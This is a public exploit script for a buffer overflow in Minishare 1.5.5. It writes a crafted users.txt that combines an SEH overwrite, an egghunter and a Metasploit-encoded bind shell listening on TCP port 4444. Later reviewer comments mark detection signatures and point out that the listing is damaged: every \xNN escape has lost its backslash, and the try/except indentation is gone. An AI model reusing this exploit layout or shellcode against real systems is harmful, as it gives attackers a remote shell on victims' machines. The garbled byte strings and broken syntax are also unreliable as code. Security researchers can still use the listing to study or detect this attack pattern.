# Title : Minishare 1.5.5 BoF Vulnerability (users.txt) - EggHunter -
# Published : 2010-11-19
# Author : 0v3r
# Exploit Title: Minishare 1.5.5 Buffer Overflow Vulnerability (users.txt) - EggHunter Version
# Date: 11/19/2010
# Author: 0v3r
# Bug Found By: Chris Gabriel
# Software Link: http://sourceforge.net/projects/minishare
# Version: 1.5.5
# Tested on: Windows XP SP3 EN
# CVE: N/A
#!/usr/bin/python
# Just rewrote the exploit using egghunter to inject a bind shell payload
# Bug found by Chris Gabriel; credit goes to him
#
# To exploit just place the users.txt file in the Minishare root directory and run minishare.exe
# Egghunter stub; the 4-byte tag it searches for is on the second line (author's "EGG w00t").
# NOTE(review): in this listing the backslash of every "\xNN" escape has been stripped
# (e.g. "x66x81..."), so each "xNN" is three literal ASCII characters rather than one
# byte. The same applies to every string below, including "x90", "n" and "t" -- as
# shown, the lengths and contents differ from what the author's comments describe.
egghunter = ("x66x81xCAxFFx0Fx42x52x6Ax02x58xCDx2Ex3Cx05x5Ax74xEFxB8"
"x77x30x30x74" # EGG w00t
"x8BxFAxAFx75xEAxAFx75xE7xFFxE7")
# win32_bind - EXITFUNC=process LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
# Metasploit-generated bind-shell payload (listener on TCP 4444 per the line above),
# Alpha2-encoded, which is why the bytes below are almost all printable. The decoder
# stub and the egg tag are static, so they are usable as detection signatures for a
# tampered users.txt.
shellcode =("xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
"x49x49x49x49x49x49x49x48x49x49x49x49x51x5ax6ax43"
"x58x30x41x30x50x42x6bx42x41x53x42x32x42x41x32x41"
"x42x41x30x41x41x58x50x38x42x42x75x7ax49x4bx4cx50"
"x6ax78x6bx72x6dx6bx58x6bx49x79x6fx6bx4fx49x6fx53"
"x50x4cx4bx30x6cx56x44x46x44x6ex6bx32x65x35x6cx4c"
"x4bx41x6cx67x75x44x38x65x51x6ax4fx6cx4bx50x4fx64"
"x58x6cx4bx71x4fx75x70x74x41x5ax4bx33x79x6cx4bx70"
"x34x4ex6bx57x71x4ax4ex56x51x6fx30x4fx69x4cx6cx6c"
"x44x69x50x71x64x44x47x4bx71x7ax6ax54x4dx63x31x58"
"x42x5ax4bx4bx44x37x4bx30x54x65x74x37x58x70x75x38"
"x65x4ex6bx53x6fx61x34x56x61x58x6bx30x66x6ex6bx76"
"x6cx50x4bx6cx4bx31x4fx75x4cx73x31x4ax4bx53x33x46"
"x4cx4ex6bx6cx49x32x4cx77x54x55x4cx45x31x4bx73x45"
"x61x4bx6bx55x34x4ex6bx37x33x30x30x4ex6bx51x50x64"
"x4cx6cx4bx52x50x45x4cx6ex4dx4ex6bx31x50x37x78x73"
"x6ex50x68x6cx4ex52x6ex74x4ex48x6cx52x70x49x6fx48"
"x56x41x76x30x53x30x66x35x38x74x73x76x52x30x68x70"
"x77x70x73x37x42x71x4fx73x64x49x6fx58x50x53x58x58"
"x4bx7ax4dx4bx4cx75x6bx42x70x79x6fx4ex36x73x6fx4e"
"x69x4dx35x55x36x4ex61x6ax4dx66x68x47x72x30x55x50"
"x6ax64x42x39x6fx48x50x33x58x6ex39x35x59x6ax55x4c"
"x6dx73x67x4bx4fx4bx66x76x33x62x73x66x33x70x53x53"
"x63x57x33x56x33x61x53x53x63x6bx4fx4ax70x51x76x63"
"x58x46x71x71x4cx72x46x63x63x6cx49x6bx51x4fx65x61"
"x78x4dx74x44x5ax32x50x59x57x51x47x6bx4fx58x56x72"
"x4ax32x30x50x51x42x75x6bx4fx68x50x42x48x4fx54x4e"
"x4dx44x6ex6dx39x33x67x4bx4fx68x56x76x33x73x65x79"
"x6fx6ex30x73x58x6bx55x33x79x4ex66x37x39x30x57x59"
"x6fx58x56x70x50x53x64x50x54x63x65x4bx4fx4ex30x4f"
"x63x72x48x78x67x62x59x7ax66x44x39x42x77x79x6fx48"
"x56x66x35x4bx4fx6ax70x30x66x50x6ax50x64x70x66x50"
"x68x71x73x62x4dx6dx59x78x65x32x4ax52x70x56x39x54"
"x69x58x4cx6fx79x68x67x51x7ax67x34x6fx79x6dx32x36"
"x51x6fx30x78x73x4cx6ax4bx4ex72x62x76x4dx4bx4ex63"
"x72x44x6cx6cx53x6cx4dx73x4ax75x68x6ex4bx6ex4bx6e"
"x4bx75x38x33x42x6bx4ex48x33x45x46x59x6fx32x55x47"
"x34x4bx4fx49x46x63x6bx41x47x61x42x70x51x71x41x72"
"x71x52x4ax36x61x70x51x30x51x33x65x70x51x6bx4fx4e"
"x30x51x78x6cx6dx5ax79x57x75x78x4ex53x63x49x6fx6a"
"x76x63x5ax49x6fx6bx4fx56x57x6bx4fx5ax70x6ex6bx42"
"x77x6bx4cx4bx33x6bx74x73x54x4bx4fx6ex36x36x32x6b"
"x4fx68x50x35x38x31x6ex4bx68x5ax42x44x33x72x73x6b"
"x4fx4ex36x4bx4fx7ax70x43")
# Padding sized so that padding + egghunter fill the first 386 bytes of the buffer;
# presumably 386 is the distance to the overwritten SEH record (see the layout comment
# after buff below) -- unverified here.
nops = "x90" * (386 - len(egghunter))
morenops = "x90" * 32 # need enough NOPs to overwrite the first instance of the egg
# Handler slot overwrite: a fixed POP POP RET address (bytes E7 13 40 00, i.e.
# 0x004013E7 little-endian if the escapes were intact). A hard-coded address in the
# 0x00400000 range suggests a module loaded at a fixed base without SafeSEH/ASLR;
# those mitigations are the relevant defence against this class of overwrite.
seh = "xE7x13x40x00" # POP POP RET
# nSEH slot: the author describes EB C0 as a 64-byte short jump (back into the hunter).
nseh = "xebxc0x90x90" # short jump 64 bytes
# Doubled tag the hunter scans for; a static string, so it also serves as an indicator
# of a crafted users.txt.
egg = "w00tw00t" # the key the egghunter looks for
buff = nops + egghunter + nseh + seh + morenops + egg + shellcode
#[nops][ egghunter][short jmp (nseh)][seh (pop pop ret)][nops][w00tw00t][shellcode]
# Writes the crafted file to the current directory. NOTE(review): Python 2 print
# statements, so this does not parse on Python 3; the indentation of the try/except
# bodies has also been lost in the listing, which is a syntax error as shown.
try:
# No `with` block: if write() raises, close() is skipped.
f = open("users.txt",'w')
f.write(buff)
f.close()
print "n"
print "t---------------------------------------------------------------------------------"
print "t| Minishare 1.5.5 Buffer Overflow Vulnerability (users.txt) - EggHunter Version |"
print "t---------------------------------------------------------------------------------"
print "n"
print "t- File 'users.txt' created..."
print "t- Place the 'users.txt' file in the Minishare directory and run the program...n"
# Bare except: swallows every exception (including KeyboardInterrupt) behind one
# generic message; a narrower `except IOError` would report only write failures.
except:
print "t-Oooops! Can't write file 'users.txt'...n"